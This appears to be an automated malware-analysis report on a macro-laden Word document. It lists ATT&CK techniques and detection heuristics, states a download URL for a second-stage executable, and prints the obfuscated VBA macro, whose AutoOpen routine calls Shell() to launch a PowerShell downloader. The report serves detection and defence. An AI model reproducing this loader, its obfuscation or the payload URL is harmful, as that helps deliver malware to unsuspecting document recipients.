MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that utilizes the Shell() function to execute a command. This command constructs a PowerShell command to download a second-stage executable from the URL 'http://aionow.powershell.net/wp-content/uploads/2018/11/a.exe' and execute it. The presence of the AutoOpen macro and the critical Shell() call firing strongly indicate malicious intent.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6750018-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6750018-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
qCVmqlAQz = Shell(MbEDiXCnLE + uoaDjEZP + EdwGriA, fBfdNF) Dim AYQRCwl, iZmvWM, WPjwwDFNc, YZLGQSrW -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub AutoOpen() Dim RhuuqMOYq, TlJMQZWAt, rzUAiI, PIdYFw -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6389 bytes |
SHA-256: 0e3b2f52c78290f1ccb97bf6d8a6bb3572772e94390929675a97836fbe01f945 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
59 of 95 identifiers look randomly generated (e.g. 'IwINFnGDViBi') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "IwINFnGDViBi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function TKspl()
Const fBfdNF = 385551437 - 385551437
Dim wFbBCnEXl, dEWkRraT, wlYwlcYi, oznQZ
dEWkRraT = Len(RptDMafK)
oznQZ = ""
For wFbBCnEXl = 1 To dEWkRraT
oznQZ = oznQZ & (22 + ((wlYwlcYi + 23) Mod 112))
If wlYwlcYi >= 14 And wlYwlcYi <= 79 Then
oznQZ = oznQZ & (29 + ((wlYwlcYi + 36) Mod 136))
Else
oznQZ = oznQZ & (wlYwlcYi)
End If
Next
aTFWsJX = oznQZ
Dim vicBEU, wMMji, iTQuu, bjrHr
wMMji = Len(aQjOuU)
bjrHr = ""
For vicBEU = 1 To wMMji
bjrHr = bjrHr & (30 + ((iTQuu + 11) Mod 123))
If iTQuu >= 24 And iTQuu <= 97 Then
bjrHr = bjrHr & (32 + ((iTQuu + 24) Mod 116))
Else
bjrHr = bjrHr & (iTQuu)
End If
Next
JaDBrSuYK = bjrHr
MbEDiXCnLE = "" + iJEinB + kScwWGM + Shapes("AJSJjvSPXuP").TextFrame.ContainingRange + SrFFrMa + itjctiC
Dim RbbSFTrw, zczwKZiEP, UmwdUJST, IYtvsYurA
zczwKZiEP = Len(mmNuN)
IYtvsYurA = ""
For RbbSFTrw = 1 To zczwKZiEP
IYtvsYurA = IYtvsYurA & (31 + ((UmwdUJST + 23) Mod 139))
If UmwdUJST >= 22 And UmwdUJST <= 95 Then
IYtvsYurA = IYtvsYurA & (40 + ((UmwdUJST + 21) Mod 120))
Else
IYtvsYurA = IYtvsYurA & (UmwdUJST)
End If
Next
RKvVwG = IYtvsYurA
qCVmqlAQz = Shell(MbEDiXCnLE + uoaDjEZP + EdwGriA, fBfdNF)
Dim AYQRCwl, iZmvWM, WPjwwDFNc, YZLGQSrW
iZmvWM = Len(ijzmXsqrs)
YZLGQSrW = ""
For AYQRCwl = 1 To iZmvWM
YZLGQSrW = YZLGQSrW & (31 + ((WPjwwDFNc + 36) Mod 71))
If WPjwwDFNc >= 28 And WPjwwDFNc <= 50 Then
YZLGQSrW = YZLGQSrW & (47 + ((WPjwwDFNc + 24) Mod 110))
Else
YZLGQSrW = YZLGQSrW & (WPjwwDFNc)
End If
Next
ziavK = YZLGQSrW
Dim ijqOjbi, cZttszmT, nZFcK, YMkpSD
cZttszmT = Len(mzWfE)
YMkpSD = ""
For ijqOjbi = 1 To cZttszmT
YMkpSD = YMkpSD & (41 + ((nZFcK + 28) Mod 106))
If nZFcK >= 42 And nZFcK <= 80 Then
YMkpSD = YMkpSD & (39 + ((nZFcK + 32) Mod 127))
Else
YMkpSD = YMkpSD & (nZFcK)
End If
Next
qooLdMnlv = YMkpSD
Dim oUuDiLwtK, OlpZjYR, TJIzzQz, DBzzOW
OlpZjYR = Len(TwJWEl)
DBzzOW = ""
For oUuDiLwtK = 1 To OlpZjYR
DBzzOW = DBzzOW & (36 + ((TJIzzQz + 18) Mod 193))
If TJIzzQz >= 17 And TJIzzQz <= 65 Then
DBzzOW = DBzzOW & (41 + ((TJIzzQz + 24) Mod 57))
Else
DBzzOW = DBzzOW & (TJIzzQz)
End If
Next
wwzSDqoq = DBzzOW
Dim iZaENHvZ, iOWdIEF, NpZrHa, QtMsrSj
iOWdIEF = Len(LEtSQmi)
QtMsrSj = ""
For iZaENHvZ = 1 To iOWdIEF
QtMsrSj = QtMsrSj & (19 + ((NpZrHa + 32) Mod 82))
If NpZrHa >= 16 And NpZrHa <= 70 Then
QtMsrSj = QtMsrSj & (31 + ((NpZrHa + 35) Mod 139))
Else
QtMsrSj = QtMsrSj & (NpZrHa)
End If
Next
wuZOhVOqX = QtMsrSj
End Function
Sub AutoOpen()
Dim RhuuqMOYq, TlJMQZWAt, rzUAiI, PIdYFw
TlJMQZWAt = Len(hoYarivSA)
PIdYFw = ""
For RhuuqMOYq = 1 To TlJMQZWAt
PIdYFw = PIdYFw & (21 + ((rzUAiI + 46) Mod 75))
If rzUAiI >= 25 And rzUAiI <= 70 Then
PIdYFw = PIdYFw & (20 + ((rzUAiI + 33) Mod 63))
Else
PIdYFw = PIdYFw & (rzUAiI)
End If
Next
IVFUN = PIdYFw
Dim kwuiowjiw, LjObSCw, LzwwrL, XCvSWs
LjObSCw = Len(ZbpZh)
XCvSWs = ""
For kwuiowjiw = 1 To LjObSCw
XCvSWs = XCvSWs & (29 + ((LzwwrL + 29) Mod 68))
If LzwwrL >= 44 And LzwwrL <= 85 Then
XCvSWs = XCvSWs & (27 + ((LzwwrL + 33) Mod 71))
Else
XCvSWs = XCvSWs & (LzwwrL)
End If
Next
hTWvodCzo = XCvSWs
Dim PIztN, rSVbZC, msrioi, oiODDAvT
rSVbZC = Len(iHoszVS)
oiODDAvT = ""
For PIztN = 1 To rSVbZC
oiODDAvT = oiODDAvT & (32 + ((msrioi + 45) Mod 117))
If msrioi >= 13 And msrioi <= 81 Then
oiODDAvT = oiODDAvT & (32 + ((msrioi + 48) Mod 166))
Else
oiODDAvT = oiODDAvT & (msrioi)
End If
Next
ukjKwGC = oiODDAvT
Dim wvZUJN, LhKEnCq, UfMaodz, qjLhr
LhKEnCq = Len(CwYZaY)
qjLhr = ""
For wvZUJN = 1 To LhKEnCq
qjLhr = qjLhr & (31 + ((UfMaodz + 33) Mod 128))
If UfMaodz >= 38 And UfMaodz <= 78 Then
qjLhr = qjLhr & (45 + ((UfMaodz + 16) Mod 76))
Else
qjLhr = qjLhr & (UfMaodz)
End If
Next
cJIlYsJo = qjLhr
Dim vwwjWPmY, EzrLA, KWRAVk, YcWJt
EzrLA = Len(rzzMoUW)
YcWJt = ""
For vwwjWPmY = 1 To EzrLA
YcWJt = YcWJt & (23 + ((KWRAVk + 43) Mod 100))
If KWRAVk >= 42 And KWRAVk <= 73 Then
YcWJt = YcWJt & (25 + ((KWRAVk + 18) Mod 86))
Else
YcWJt = YcWJt & (KWRAVk)
End If
Next
cCMpAa = YcWJt
Dim hwzPMT, nNfcAv, KYZzz, rXszY
nNfcAv = Len(SwcqN)
rXszY = ""
For hwzPMT = 1 To nNfcAv
rXszY = rXszY & (24 + ((KYZzz + 33) Mod 77))
If KYZzz >= 43 And KYZzz <= 72 Then
rXszY = rXszY & (33 + ((KYZzz + 16) Mod 148))
Else
rXszY = rXszY & (KYZzz)
End If
Next
fAXsn = rXszY
TKspl
Dim MbrAD, aJPziTkL, aWmrCnmD, EbUZAvm
aJPziTkL = Len(MUPaaz)
EbUZAvm = ""
For MbrAD = 1 To aJPziTkL
EbUZAvm = EbUZAvm & (45 + ((aWmrCnmD + 41) Mod 76))
If aWmrCnmD >= 24 And aWmrCnmD <= 51 Then
EbUZAvm = EbUZAvm & (11 + ((aWmrCnmD + 15) Mod 93))
Else
EbUZAvm = EbUZAvm & (aWmrCnmD)
End If
Next
FwLAi = EbUZAvm
Dim QwlLam, GnlsV, zIzmM, hRcVbw
GnlsV = Len(DhWbBRw)
hRcVbw = ""
For QwlLam = 1 To GnlsV
hRcVbw = hRcVbw & (31 + ((zIzmM + 19) Mod 187))
If zIzmM >= 15 And zIzmM <= 86 Then
hRcVbw = hRcVbw & (32 + ((zIzmM + 20) Mod 69))
Else
hRcVbw = hRcVbw & (zIzmM)
End If
Next
pHvbAor = hRcVbw
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.